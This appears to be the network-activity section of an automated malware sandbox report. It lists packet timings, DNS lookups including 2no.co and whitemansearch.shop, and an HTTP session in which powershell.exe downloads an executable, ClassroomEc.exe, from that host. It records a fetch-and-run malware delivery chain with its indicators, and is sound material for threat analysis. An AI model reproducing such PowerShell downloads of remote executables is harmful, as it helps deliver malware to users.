                                                                                                                                                    Feb 21, 2024 08:14:10.460988998 CET49724443192.168.2.5142.250.65.228
                                                                                                                                                    Feb 21, 2024 08:14:10.461049080 CET44349724142.250.65.228192.168.2.5
                                                                                                                                                    Feb 21, 2024 08:14:10.462419033 CET49727443192.168.2.5142.250.65.228
                                                                                                                                                    Feb 21, 2024 08:14:10.462464094 CET44349727142.250.65.228192.168.2.5
                                                                                                                                                    Feb 21, 2024 08:14:10.462523937 CET49727443192.168.2.5142.250.65.228
                                                                                                                                                    Feb 21, 2024 08:14:10.463138103 CET49724443192.168.2.5142.250.65.228
                                                                                                                                                    Feb 21, 2024 08:14:10.463156939 CET44349724142.250.65.228192.168.2.5
                                                                                                                                                    Feb 21, 2024 08:14:10.463409901 CET49727443192.168.2.5142.250.65.228
                                                                                                                                                    Feb 21, 2024 08:14:10.463423014 CET44349727142.250.65.228192.168.2.5
                                                                                                                                                    Feb 21, 2024 08:14:10.531666040 CET4434970323.1.237.91192.168.2.5
                                                                                                                                                    Feb 21, 2024 08:14:10.531749964 CET49703443192.168.2.523.1.237.91
                                                                                                                                                    Feb 21, 2024 08:14:10.645029068 CET44349724142.250.65.228192.168.2.5
                                                                                                                                                    Feb 21, 2024 08:14:10.645076990 CET44349724142.250.65.228192.168.2.5
                                                                                                                                                    Feb 21, 2024 08:14:10.645107985 CET44349724142.250.65.228192.168.2.5
                                                                                                                                                    Feb 21, 2024 08:14:10.645134926 CET49724443192.168.2.5142.250.65.228
                                                                                                                                                    Feb 21, 2024 08:14:10.645158052 CET44349724142.250.65.228192.168.2.5
                                                                                                                                                    Feb 21, 2024 08:14:10.645181894 CET44349724142.250.65.228192.168.2.5
                                                                                                                                                    Feb 21, 2024 08:14:10.645224094 CET49724443192.168.2.5142.250.65.228
                                                                                                                                                    Feb 21, 2024 08:14:10.645230055 CET44349724142.250.65.228192.168.2.5
                                                                                                                                                    Feb 21, 2024 08:14:10.645382881 CET49724443192.168.2.5142.250.65.228
                                                                                                                                                    Feb 21, 2024 08:14:10.651144981 CET44349724142.250.65.228192.168.2.5
                                                                                                                                                    Feb 21, 2024 08:14:10.651616096 CET44349727142.250.65.228192.168.2.5
                                                                                                                                                    Feb 21, 2024 08:14:10.652065039 CET49727443192.168.2.5142.250.65.228
                                                                                                                                                    Feb 21, 2024 08:14:10.652127028 CET44349727142.250.65.228192.168.2.5
                                                                                                                                                    Feb 21, 2024 08:14:10.652646065 CET44349727142.250.65.228192.168.2.5
                                                                                                                                                    Feb 21, 2024 08:14:10.653273106 CET49727443192.168.2.5142.250.65.228
                                                                                                                                                    Feb 21, 2024 08:14:10.653362989 CET44349727142.250.65.228192.168.2.5
                                                                                                                                                    Feb 21, 2024 08:14:10.653449059 CET49727443192.168.2.5142.250.65.228
                                                                                                                                                    Feb 21, 2024 08:14:10.653476000 CET44349727142.250.65.228192.168.2.5
                                                                                                                                                    Feb 21, 2024 08:14:10.657517910 CET44349724142.250.65.228192.168.2.5
                                                                                                                                                    Feb 21, 2024 08:14:10.657562017 CET44349724142.250.65.228192.168.2.5
                                                                                                                                                    Feb 21, 2024 08:14:10.657568932 CET49724443192.168.2.5142.250.65.228
                                                                                                                                                    Feb 21, 2024 08:14:10.657574892 CET44349724142.250.65.228192.168.2.5
                                                                                                                                                    Feb 21, 2024 08:14:10.657633066 CET49724443192.168.2.5142.250.65.228
                                                                                                                                                    Feb 21, 2024 08:14:10.663927078 CET44349724142.250.65.228192.168.2.5
                                                                                                                                                    Feb 21, 2024 08:14:10.670285940 CET44349724142.250.65.228192.168.2.5
                                                                                                                                                    Feb 21, 2024 08:14:10.670437098 CET49724443192.168.2.5142.250.65.228
                                                                                                                                                    Feb 21, 2024 08:14:10.670443058 CET44349724142.250.65.228192.168.2.5
                                                                                                                                                    Feb 21, 2024 08:14:10.735578060 CET44349724142.250.65.228192.168.2.5
                                                                                                                                                    Feb 21, 2024 08:14:10.735660076 CET49724443192.168.2.5142.250.65.228
                                                                                                                                                    Feb 21, 2024 08:14:10.735671043 CET44349724142.250.65.228192.168.2.5
                                                                                                                                                    Feb 21, 2024 08:14:10.735713005 CET49724443192.168.2.5142.250.65.228
                                                                                                                                                    Feb 21, 2024 08:14:10.753962994 CET49724443192.168.2.5142.250.65.228
                                                                                                                                                    Feb 21, 2024 08:14:10.753993034 CET44349724142.250.65.228192.168.2.5
                                                                                                                                                    Feb 21, 2024 08:14:10.851319075 CET44349727142.250.65.228192.168.2.5
                                                                                                                                                    Feb 21, 2024 08:14:10.851495028 CET44349727142.250.65.228192.168.2.5
                                                                                                                                                    Feb 21, 2024 08:14:10.851604939 CET49727443192.168.2.5142.250.65.228
                                                                                                                                                    Feb 21, 2024 08:14:10.869393110 CET49727443192.168.2.5142.250.65.228
                                                                                                                                                    Feb 21, 2024 08:14:10.869442940 CET44349727142.250.65.228192.168.2.5
                                                                                                                                                    Feb 21, 2024 08:14:11.284291029 CET49729443192.168.2.5142.250.65.228
                                                                                                                                                    Feb 21, 2024 08:14:11.284329891 CET44349729142.250.65.228192.168.2.5
                                                                                                                                                    Feb 21, 2024 08:14:11.284421921 CET49729443192.168.2.5142.250.65.228
                                                                                                                                                    Feb 21, 2024 08:14:11.287029028 CET49729443192.168.2.5142.250.65.228
                                                                                                                                                    Feb 21, 2024 08:14:11.287045002 CET44349729142.250.65.228192.168.2.5
                                                                                                                                                    Feb 21, 2024 08:14:11.436120987 CET4971680192.168.2.55.101.153.86
                                                                                                                                                    Feb 21, 2024 08:14:11.477453947 CET44349729142.250.65.228192.168.2.5
                                                                                                                                                    Feb 21, 2024 08:14:11.477801085 CET49729443192.168.2.5142.250.65.228
                                                                                                                                                    Feb 21, 2024 08:14:11.477812052 CET44349729142.250.65.228192.168.2.5
                                                                                                                                                    Feb 21, 2024 08:14:11.478147030 CET44349729142.250.65.228192.168.2.5
                                                                                                                                                    Feb 21, 2024 08:14:11.478574991 CET49729443192.168.2.5142.250.65.228
                                                                                                                                                    Feb 21, 2024 08:14:11.478637934 CET44349729142.250.65.228192.168.2.5
                                                                                                                                                    Feb 21, 2024 08:14:11.478779078 CET49729443192.168.2.5142.250.65.228
                                                                                                                                                    Feb 21, 2024 08:14:11.521904945 CET44349729142.250.65.228192.168.2.5
                                                                                                                                                    Feb 21, 2024 08:14:11.680495024 CET44349729142.250.65.228192.168.2.5
                                                                                                                                                    Feb 21, 2024 08:14:11.680550098 CET44349729142.250.65.228192.168.2.5
                                                                                                                                                    Feb 21, 2024 08:14:11.680583954 CET44349729142.250.65.228192.168.2.5
                                                                                                                                                    Feb 21, 2024 08:14:11.680608988 CET49729443192.168.2.5142.250.65.228
                                                                                                                                                    Feb 21, 2024 08:14:11.680619955 CET44349729142.250.65.228192.168.2.5
                                                                                                                                                    Feb 21, 2024 08:14:11.680655003 CET44349729142.250.65.228192.168.2.5
                                                                                                                                                    Feb 21, 2024 08:14:11.680763006 CET49729443192.168.2.5142.250.65.228
                                                                                                                                                    Feb 21, 2024 08:14:11.680772066 CET44349729142.250.65.228192.168.2.5
                                                                                                                                                    Feb 21, 2024 08:14:11.680887938 CET49729443192.168.2.5142.250.65.228
                                                                                                                                                    Feb 21, 2024 08:14:11.686371088 CET44349729142.250.65.228192.168.2.5
                                                                                                                                                    Feb 21, 2024 08:14:11.688535929 CET44349729142.250.65.228192.168.2.5
                                                                                                                                                    Feb 21, 2024 08:14:11.688764095 CET49729443192.168.2.5142.250.65.228
                                                                                                                                                    Feb 21, 2024 08:14:11.689905882 CET49729443192.168.2.5142.250.65.228
                                                                                                                                                    Feb 21, 2024 08:14:11.689920902 CET44349729142.250.65.228192.168.2.5
                                                                                                                                                    Feb 21, 2024 08:14:11.811039925 CET49730443192.168.2.5142.250.65.228
                                                                                                                                                    Feb 21, 2024 08:14:11.811084986 CET44349730142.250.65.228192.168.2.5
                                                                                                                                                    Feb 21, 2024 08:14:11.811191082 CET49730443192.168.2.5142.250.65.228
                                                                                                                                                    Feb 21, 2024 08:14:11.811546087 CET49730443192.168.2.5142.250.65.228
                                                                                                                                                    Feb 21, 2024 08:14:11.811563015 CET44349730142.250.65.228192.168.2.5
                                                                                                                                                    Feb 21, 2024 08:14:11.998205900 CET44349730142.250.65.228192.168.2.5
                                                                                                                                                    Feb 21, 2024 08:14:11.998650074 CET49730443192.168.2.5142.250.65.228
                                                                                                                                                    Feb 21, 2024 08:14:11.998677015 CET44349730142.250.65.228192.168.2.5
                                                                                                                                                    Feb 21, 2024 08:14:11.999042034 CET44349730142.250.65.228192.168.2.5
                                                                                                                                                    Feb 21, 2024 08:14:11.999346972 CET49730443192.168.2.5142.250.65.228
                                                                                                                                                    Feb 21, 2024 08:14:11.999418020 CET44349730142.250.65.228192.168.2.5
                                                                                                                                                    Feb 21, 2024 08:14:11.999528885 CET49730443192.168.2.5142.250.65.228
                                                                                                                                                    Feb 21, 2024 08:14:12.041912079 CET44349730142.250.65.228192.168.2.5
                                                                                                                                                    Feb 21, 2024 08:14:12.047157049 CET49730443192.168.2.5142.250.65.228
                                                                                                                                                    Feb 21, 2024 08:14:12.178256035 CET44349730142.250.65.228192.168.2.5
                                                                                                                                                    Feb 21, 2024 08:14:12.178299904 CET44349730142.250.65.228192.168.2.5
                                                                                                                                                    Feb 21, 2024 08:14:12.178324938 CET44349730142.250.65.228192.168.2.5
                                                                                                                                                    Feb 21, 2024 08:14:12.178349972 CET44349730142.250.65.228192.168.2.5
                                                                                                                                                    Feb 21, 2024 08:14:12.178390026 CET49730443192.168.2.5142.250.65.228
                                                                                                                                                    Feb 21, 2024 08:14:12.178423882 CET44349730142.250.65.228192.168.2.5
                                                                                                                                                    Feb 21, 2024 08:14:12.178437948 CET49730443192.168.2.5142.250.65.228
                                                                                                                                                    Feb 21, 2024 08:14:12.180803061 CET44349730142.250.65.228192.168.2.5
                                                                                                                                                    Feb 21, 2024 08:14:12.180874109 CET49730443192.168.2.5142.250.65.228
                                                                                                                                                    Feb 21, 2024 08:14:12.193240881 CET49730443192.168.2.5142.250.65.228
                                                                                                                                                    Feb 21, 2024 08:14:12.193270922 CET44349730142.250.65.228192.168.2.5
                                                                                                                                                    Feb 21, 2024 08:14:12.193312883 CET49730443192.168.2.5142.250.65.228
                                                                                                                                                    Feb 21, 2024 08:14:12.193372965 CET49730443192.168.2.5142.250.65.228
                                                                                                                                                    Feb 21, 2024 08:14:12.350541115 CET49731443192.168.2.5142.251.40.100
                                                                                                                                                    Feb 21, 2024 08:14:12.350590944 CET44349731142.251.40.100192.168.2.5
                                                                                                                                                    Feb 21, 2024 08:14:12.350778103 CET49731443192.168.2.5142.251.40.100
                                                                                                                                                    Feb 21, 2024 08:14:12.351171017 CET49731443192.168.2.5142.251.40.100
                                                                                                                                                    Feb 21, 2024 08:14:12.351181030 CET44349731142.251.40.100192.168.2.5
                                                                                                                                                    Feb 21, 2024 08:14:12.615690947 CET44349731142.251.40.100192.168.2.5
                                                                                                                                                    Feb 21, 2024 08:14:12.616034031 CET49731443192.168.2.5142.251.40.100
                                                                                                                                                    Feb 21, 2024 08:14:12.616064072 CET44349731142.251.40.100192.168.2.5
                                                                                                                                                    Feb 21, 2024 08:14:12.617130995 CET44349731142.251.40.100192.168.2.5
                                                                                                                                                    Feb 21, 2024 08:14:12.617197990 CET49731443192.168.2.5142.251.40.100
                                                                                                                                                    Feb 21, 2024 08:14:12.617592096 CET49731443192.168.2.5142.251.40.100
                                                                                                                                                    Feb 21, 2024 08:14:12.617654085 CET44349731142.251.40.100192.168.2.5
                                                                                                                                                    Feb 21, 2024 08:14:12.617840052 CET49731443192.168.2.5142.251.40.100
                                                                                                                                                    Feb 21, 2024 08:14:12.617846966 CET44349731142.251.40.100192.168.2.5
                                                                                                                                                    Feb 21, 2024 08:14:12.719055891 CET49731443192.168.2.5142.251.40.100
                                                                                                                                                    Feb 21, 2024 08:14:12.874174118 CET44349731142.251.40.100192.168.2.5
                                                                                                                                                    Feb 21, 2024 08:14:12.874222994 CET44349731142.251.40.100192.168.2.5
                                                                                                                                                    Feb 21, 2024 08:14:12.874249935 CET44349731142.251.40.100192.168.2.5
                                                                                                                                                    Feb 21, 2024 08:14:12.874281883 CET44349731142.251.40.100192.168.2.5
                                                                                                                                                    Feb 21, 2024 08:14:12.874300957 CET49731443192.168.2.5142.251.40.100
                                                                                                                                                    Feb 21, 2024 08:14:12.874332905 CET44349731142.251.40.100192.168.2.5
                                                                                                                                                    Feb 21, 2024 08:14:12.874352932 CET49731443192.168.2.5142.251.40.100
                                                                                                                                                    Feb 21, 2024 08:14:12.877762079 CET44349731142.251.40.100192.168.2.5
                                                                                                                                                    Feb 21, 2024 08:14:12.877846003 CET49731443192.168.2.5142.251.40.100
                                                                                                                                                    Feb 21, 2024 08:14:12.902055025 CET49731443192.168.2.5142.251.40.100
                                                                                                                                                    Feb 21, 2024 08:14:12.902089119 CET44349731142.251.40.100192.168.2.5
                                                                                                                                                    Feb 21, 2024 08:14:12.902101040 CET49731443192.168.2.5142.251.40.100
                                                                                                                                                    Feb 21, 2024 08:14:12.902134895 CET49731443192.168.2.5142.251.40.100
                                                                                                                                                    Feb 21, 2024 08:14:20.016283035 CET49732443192.168.2.513.85.23.86
                                                                                                                                                    Feb 21, 2024 08:14:20.016366005 CET4434973213.85.23.86192.168.2.5
                                                                                                                                                    Feb 21, 2024 08:14:20.016446114 CET49732443192.168.2.513.85.23.86
                                                                                                                                                    Feb 21, 2024 08:14:20.020591974 CET49732443192.168.2.513.85.23.86
                                                                                                                                                    Feb 21, 2024 08:14:20.020644903 CET4434973213.85.23.86192.168.2.5
                                                                                                                                                    Feb 21, 2024 08:14:20.447856903 CET4434973213.85.23.86192.168.2.5
                                                                                                                                                    Feb 21, 2024 08:14:20.447958946 CET49732443192.168.2.513.85.23.86
                                                                                                                                                    Feb 21, 2024 08:14:20.451282024 CET49732443192.168.2.513.85.23.86
                                                                                                                                                    Feb 21, 2024 08:14:20.451312065 CET4434973213.85.23.86192.168.2.5
                                                                                                                                                    Feb 21, 2024 08:14:20.451719046 CET4434973213.85.23.86192.168.2.5
                                                                                                                                                    Feb 21, 2024 08:14:20.551567078 CET49732443192.168.2.513.85.23.86
                                                                                                                                                    Feb 21, 2024 08:14:20.974101067 CET49703443192.168.2.523.1.237.91
                                                                                                                                                    Feb 21, 2024 08:14:20.974518061 CET49703443192.168.2.523.1.237.91
                                                                                                                                                    Feb 21, 2024 08:14:20.976772070 CET49735443192.168.2.523.1.237.91
                                                                                                                                                    Feb 21, 2024 08:14:20.976810932 CET4434973523.1.237.91192.168.2.5
                                                                                                                                                    Feb 21, 2024 08:14:20.977145910 CET49735443192.168.2.523.1.237.91
                                                                                                                                                    Feb 21, 2024 08:14:20.990920067 CET49735443192.168.2.523.1.237.91
                                                                                                                                                    Feb 21, 2024 08:14:20.990936995 CET4434973523.1.237.91192.168.2.5
                                                                                                                                                    Feb 21, 2024 08:14:21.017980099 CET49732443192.168.2.513.85.23.86
                                                                                                                                                    Feb 21, 2024 08:14:21.061904907 CET4434973213.85.23.86192.168.2.5
                                                                                                                                                    Feb 21, 2024 08:14:21.126708031 CET4434970323.1.237.91192.168.2.5
                                                                                                                                                    Feb 21, 2024 08:14:21.126876116 CET4434970323.1.237.91192.168.2.5
                                                                                                                                                    Feb 21, 2024 08:14:21.289541006 CET4434973213.85.23.86192.168.2.5
                                                                                                                                                    Feb 21, 2024 08:14:21.289580107 CET4434973213.85.23.86192.168.2.5
                                                                                                                                                    Feb 21, 2024 08:14:21.289588928 CET4434973213.85.23.86192.168.2.5
                                                                                                                                                    Feb 21, 2024 08:14:21.289628029 CET4434973213.85.23.86192.168.2.5
                                                                                                                                                    Feb 21, 2024 08:14:21.289630890 CET49732443192.168.2.513.85.23.86
                                                                                                                                                    Feb 21, 2024 08:14:21.289648056 CET4434973213.85.23.86192.168.2.5
                                                                                                                                                    Feb 21, 2024 08:14:21.289663076 CET4434973213.85.23.86192.168.2.5
                                                                                                                                                    Feb 21, 2024 08:14:21.289684057 CET4434973213.85.23.86192.168.2.5
                                                                                                                                                    Feb 21, 2024 08:14:21.289702892 CET4434973213.85.23.86192.168.2.5
                                                                                                                                                    Feb 21, 2024 08:14:21.289706945 CET49732443192.168.2.513.85.23.86
                                                                                                                                                    Feb 21, 2024 08:14:21.289706945 CET49732443192.168.2.513.85.23.86
                                                                                                                                                    Feb 21, 2024 08:14:21.289706945 CET49732443192.168.2.513.85.23.86
                                                                                                                                                    Feb 21, 2024 08:14:21.289716005 CET4434973213.85.23.86192.168.2.5
                                                                                                                                                    Feb 21, 2024 08:14:21.289729118 CET49732443192.168.2.513.85.23.86
                                                                                                                                                    Feb 21, 2024 08:14:21.289735079 CET4434973213.85.23.86192.168.2.5
                                                                                                                                                    Feb 21, 2024 08:14:21.289747000 CET49732443192.168.2.513.85.23.86
                                                                                                                                                    Feb 21, 2024 08:14:21.289767027 CET49732443192.168.2.513.85.23.86
                                                                                                                                                    Feb 21, 2024 08:14:21.289782047 CET49732443192.168.2.513.85.23.86
                                                                                                                                                    Feb 21, 2024 08:14:21.289787054 CET4434973213.85.23.86192.168.2.5
                                                                                                                                                    Feb 21, 2024 08:14:21.289818048 CET4434973213.85.23.86192.168.2.5
                                                                                                                                                    Feb 21, 2024 08:14:21.289855003 CET49732443192.168.2.513.85.23.86
                                                                                                                                                    Feb 21, 2024 08:14:21.316837072 CET4434973523.1.237.91192.168.2.5
                                                                                                                                                    Feb 21, 2024 08:14:21.316962957 CET49735443192.168.2.523.1.237.91
                                                                                                                                                    Feb 21, 2024 08:14:21.336071968 CET49735443192.168.2.523.1.237.91
                                                                                                                                                    Feb 21, 2024 08:14:21.336090088 CET4434973523.1.237.91192.168.2.5
                                                                                                                                                    Feb 21, 2024 08:14:21.337156057 CET4434973523.1.237.91192.168.2.5
                                                                                                                                                    Feb 21, 2024 08:14:21.337238073 CET49735443192.168.2.523.1.237.91
                                                                                                                                                    Feb 21, 2024 08:14:21.337732077 CET49735443192.168.2.523.1.237.91
                                                                                                                                                    Feb 21, 2024 08:14:21.337790966 CET4434973523.1.237.91192.168.2.5
                                                                                                                                                    Feb 21, 2024 08:14:21.337902069 CET49735443192.168.2.523.1.237.91
                                                                                                                                                    Feb 21, 2024 08:14:21.337908030 CET4434973523.1.237.91192.168.2.5
                                                                                                                                                    Feb 21, 2024 08:14:21.532071114 CET49732443192.168.2.513.85.23.86
                                                                                                                                                    Feb 21, 2024 08:14:21.532109022 CET4434973213.85.23.86192.168.2.5
                                                                                                                                                    Feb 21, 2024 08:14:21.532136917 CET49732443192.168.2.513.85.23.86
                                                                                                                                                    Feb 21, 2024 08:14:21.532144070 CET4434973213.85.23.86192.168.2.5
                                                                                                                                                    Feb 21, 2024 08:14:21.713648081 CET4434973523.1.237.91192.168.2.5
                                                                                                                                                    Feb 21, 2024 08:14:21.713759899 CET49735443192.168.2.523.1.237.91
                                                                                                                                                    Feb 21, 2024 08:14:21.714049101 CET49735443192.168.2.523.1.237.91
                                                                                                                                                    Feb 21, 2024 08:14:21.714155912 CET4434973523.1.237.91192.168.2.5
                                                                                                                                                    Feb 21, 2024 08:14:21.714255095 CET49735443192.168.2.523.1.237.91
                                                                                                                                                    TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                    Feb 21, 2024 08:14:05.493833065 CET6183053192.168.2.51.1.1.1
                                                                                                                                                    Feb 21, 2024 08:14:05.494172096 CET6317753192.168.2.51.1.1.1
                                                                                                                                                    Feb 21, 2024 08:14:05.511769056 CET5101153192.168.2.51.1.1.1
                                                                                                                                                    Feb 21, 2024 08:14:05.511873960 CET5155053192.168.2.51.1.1.1
                                                                                                                                                    Feb 21, 2024 08:14:05.512411118 CET5531753192.168.2.51.1.1.1
                                                                                                                                                    Feb 21, 2024 08:14:05.513000965 CET5714153192.168.2.51.1.1.1
                                                                                                                                                    Feb 21, 2024 08:14:05.584017992 CET53600431.1.1.1192.168.2.5
                                                                                                                                                    Feb 21, 2024 08:14:05.587074041 CET53618301.1.1.1192.168.2.5
                                                                                                                                                    Feb 21, 2024 08:14:05.587666988 CET53631771.1.1.1192.168.2.5
                                                                                                                                                    Feb 21, 2024 08:14:05.599520922 CET53510111.1.1.1192.168.2.5
                                                                                                                                                    Feb 21, 2024 08:14:05.599586010 CET53515501.1.1.1192.168.2.5
                                                                                                                                                    Feb 21, 2024 08:14:05.600016117 CET53553171.1.1.1192.168.2.5
                                                                                                                                                    Feb 21, 2024 08:14:05.600645065 CET53571411.1.1.1192.168.2.5
                                                                                                                                                    Feb 21, 2024 08:14:06.331773043 CET53495161.1.1.1192.168.2.5
                                                                                                                                                    Feb 21, 2024 08:14:06.410953045 CET5508553192.168.2.51.1.1.1
                                                                                                                                                    Feb 21, 2024 08:14:06.411271095 CET6448553192.168.2.51.1.1.1
                                                                                                                                                    Feb 21, 2024 08:14:06.498903036 CET53550851.1.1.1192.168.2.5
                                                                                                                                                    Feb 21, 2024 08:14:06.499413967 CET53644851.1.1.1192.168.2.5
                                                                                                                                                    Feb 21, 2024 08:14:06.959110022 CET5461353192.168.2.51.1.1.1
                                                                                                                                                    Feb 21, 2024 08:14:07.573193073 CET53546131.1.1.1192.168.2.5
                                                                                                                                                    Feb 21, 2024 08:14:08.275077105 CET53493221.1.1.1192.168.2.5
                                                                                                                                                    Feb 21, 2024 08:14:09.329623938 CET53639771.1.1.1192.168.2.5
                                                                                                                                                    Feb 21, 2024 08:14:10.382775068 CET53492031.1.1.1192.168.2.5
                                                                                                                                                    Feb 21, 2024 08:14:10.746144056 CET53561421.1.1.1192.168.2.5
                                                                                                                                                    Feb 21, 2024 08:14:12.261431932 CET6295853192.168.2.51.1.1.1
                                                                                                                                                    Feb 21, 2024 08:14:12.261639118 CET5713253192.168.2.51.1.1.1
                                                                                                                                                    Feb 21, 2024 08:14:12.349150896 CET53629581.1.1.1192.168.2.5
                                                                                                                                                    Feb 21, 2024 08:14:12.349386930 CET53571321.1.1.1192.168.2.5
                                                                                                                                                    Feb 21, 2024 08:14:23.493352890 CET53641631.1.1.1192.168.2.5
                                                                                                                                                    Feb 21, 2024 08:14:42.496587992 CET53506271.1.1.1192.168.2.5
                                                                                                                                                    Feb 21, 2024 08:14:43.889957905 CET59869274192.168.2.5192.168.2.1
                                                                                                                                                    TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                                                                                    Feb 21, 2024 08:14:05.493833065 CET192.168.2.51.1.1.10xeabStandard query (0)2no.coA (IP address)IN (0x0001)false
                                                                                                                                                    Feb 21, 2024 08:14:05.494172096 CET192.168.2.51.1.1.10xa373Standard query (0)2no.co65IN (0x0001)false
                                                                                                                                                    Feb 21, 2024 08:14:05.511769056 CET192.168.2.51.1.1.10x19c5Standard query (0)clients2.google.comA (IP address)IN (0x0001)false
                                                                                                                                                    Feb 21, 2024 08:14:05.511873960 CET192.168.2.51.1.1.10xb5aeStandard query (0)clients2.google.com65IN (0x0001)false
                                                                                                                                                    Feb 21, 2024 08:14:05.512411118 CET192.168.2.51.1.1.10xaecbStandard query (0)accounts.google.comA (IP address)IN (0x0001)false
                                                                                                                                                    Feb 21, 2024 08:14:05.513000965 CET192.168.2.51.1.1.10x2cdeStandard query (0)accounts.google.com65IN (0x0001)false
                                                                                                                                                    Feb 21, 2024 08:14:06.410953045 CET192.168.2.51.1.1.10x23bStandard query (0)www.google.comA (IP address)IN (0x0001)false
                                                                                                                                                    Feb 21, 2024 08:14:06.411271095 CET192.168.2.51.1.1.10xfb8dStandard query (0)www.google.com65IN (0x0001)false
                                                                                                                                                    Feb 21, 2024 08:14:06.959110022 CET192.168.2.51.1.1.10xc667Standard query (0)whitemansearch.shopA (IP address)IN (0x0001)false
                                                                                                                                                    Feb 21, 2024 08:14:12.261431932 CET192.168.2.51.1.1.10x45bbStandard query (0)www.google.comA (IP address)IN (0x0001)false
                                                                                                                                                    Feb 21, 2024 08:14:12.261639118 CET192.168.2.51.1.1.10x9b90Standard query (0)www.google.com65IN (0x0001)false
                                                                                                                                                    TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                                                                                    Feb 21, 2024 08:14:05.587074041 CET1.1.1.1192.168.2.50xeabNo error (0)2no.co104.21.79.229A (IP address)IN (0x0001)false
                                                                                                                                                    Feb 21, 2024 08:14:05.587074041 CET1.1.1.1192.168.2.50xeabNo error (0)2no.co172.67.149.76A (IP address)IN (0x0001)false
                                                                                                                                                    Feb 21, 2024 08:14:05.587666988 CET1.1.1.1192.168.2.50xa373No error (0)2no.co65IN (0x0001)false
                                                                                                                                                    Feb 21, 2024 08:14:05.599520922 CET1.1.1.1192.168.2.50x19c5No error (0)clients2.google.comclients.l.google.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                    Feb 21, 2024 08:14:05.599520922 CET1.1.1.1192.168.2.50x19c5No error (0)clients.l.google.com142.251.40.174A (IP address)IN (0x0001)false
                                                                                                                                                    Feb 21, 2024 08:14:05.599586010 CET1.1.1.1192.168.2.50xb5aeNo error (0)clients2.google.comclients.l.google.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                    Feb 21, 2024 08:14:05.600016117 CET1.1.1.1192.168.2.50xaecbNo error (0)accounts.google.com142.251.163.84A (IP address)IN (0x0001)false
                                                                                                                                                    Feb 21, 2024 08:14:06.498903036 CET1.1.1.1192.168.2.50x23bNo error (0)www.google.com142.250.65.228A (IP address)IN (0x0001)false
                                                                                                                                                    Feb 21, 2024 08:14:06.499413967 CET1.1.1.1192.168.2.50xfb8dNo error (0)www.google.com65IN (0x0001)false
                                                                                                                                                    Feb 21, 2024 08:14:07.573193073 CET1.1.1.1192.168.2.50xc667No error (0)whitemansearch.shop5.101.153.86A (IP address)IN (0x0001)false
                                                                                                                                                    Feb 21, 2024 08:14:12.349150896 CET1.1.1.1192.168.2.50x45bbNo error (0)www.google.com142.251.40.100A (IP address)IN (0x0001)false
                                                                                                                                                    Feb 21, 2024 08:14:12.349386930 CET1.1.1.1192.168.2.50x9b90No error (0)www.google.com65IN (0x0001)false
                                                                                                                                                    • 2no.co
                                                                                                                                                    • accounts.google.com
                                                                                                                                                    • clients2.google.com
                                                                                                                                                    • fs.microsoft.com
                                                                                                                                                    • www.google.com
                                                                                                                                                    • https:
                                                                                                                                                      • www.bing.com
                                                                                                                                                    • slscr.update.microsoft.com
                                                                                                                                                    • update.googleapis.com
                                                                                                                                                    • clients1.google.com
                                                                                                                                                    • whitemansearch.shop
                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                    0192.168.2.5497165.101.153.86804408C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                    Feb 21, 2024 08:14:07.856656075 CET84OUTGET /ClassroomEc.exe HTTP/1.1
                                                                                                                                                    Host: whitemansearch.shop
                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                    Feb 21, 2024 08:14:08.072309971 CET1286INHTTP/1.1 200 OK
                                                                                                                                                    Server: nginx-reuseport/1.21.1
                                                                                                                                                    Date: Wed, 21 Feb 2024 07:14:07 GMT
                                                                                                                                                    Content-Type: application/octet-stream
                                                                                                                                                    Content-Length: 1212711
                                                                                                                                                    Last-Modified: Tue, 20 Feb 2024 15:43:47 GMT
                                                                                                                                                    Connection: keep-alive
                                                                                                                                                    Keep-Alive: timeout=30
                                                                                                                                                    ETag: "65d4c8b3-128127"
                                                                                                                                                    Expires: Fri, 22 Mar 2024 07:14:07 GMT
                                                                                                                                                    Cache-Control: max-age=2592000
                                                                                                                                                    Accept-Ranges: bytes
